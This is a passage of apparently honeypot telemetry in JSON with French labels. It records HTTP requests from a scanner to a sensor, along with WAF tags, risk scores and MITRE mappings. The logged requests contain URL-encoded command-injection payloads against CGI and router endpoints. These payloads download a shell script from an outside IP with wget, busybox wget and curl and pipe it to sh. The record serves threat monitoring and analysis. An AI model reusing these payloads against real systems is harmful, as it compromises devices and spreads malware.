\/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20hik3%60\u0022, \u0022request_line\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bcurl%20http:\/\/\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/Security\/auditLog\/search?logTime=0;%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20hik3%3Bbusybox%20wge\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":292},{"id":11809375,"ip":"45.153.34.219","ts":"2026-07-14 02:18:15.000000","proto":"tcp","src_port":55366,"dst_port":82,"service":"http","classification":"config_file_probe","waf_score":54,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00224a88e49893c2a046ae43e9c622b2582e2a7b45a3\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 291, \u0022payload_entropy\u0022: 5.100715970693772, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 13, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022522dfd06c92f52955135217c3d1858d15b41f0f0\u0022, \u0022event_fingerprint\u0022: \u0022c909917519b001035b5f685aa1fb3fa6b960169c\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00223d2e6e67aa4b06840e8434286f85d271\u0022, \u0022path_pattern_hash\u0022: \u00221aae85e63b4d4e5c752317f5de257989\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60\u0022, \u0022query_string\u0022: \u0022name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%2\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60\u0022, \u0022query_string\u0022: \u0022name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60 HTTP\/1.1\\r\\nHost: 6\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%2\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00227faf2e61dc1ddc0dc7adb5f6715b41272d52a411\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%2\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%2\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":291},{"id":11809376,"ip":"45.153.34.219","ts":"2026-07-14 02:18:15.000000","proto":"tcp","src_port":55368,"dst_port":82,"service":"http","classification":"config_file_probe","waf_score":60,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022]","http_method":"GET","http_target":"\/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00221a56c88a2a28a00a0b773a91cea242bcf3ae7b29\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 280, \u0022payload_entropy\u0022: 5.04830315473407, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 16, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022940d196bc21c3a03e5b9f44a68b442105f7ab6d6\u0022, \u0022event_fingerprint\u0022: \u00223c7c05438138f2b64610bb6e1f36e6ce1aff3dc7\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022, \u0022pat-0245\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022, \u0022Probe \/cgi-bin\/luci\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022, \u0022pat-0245\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, 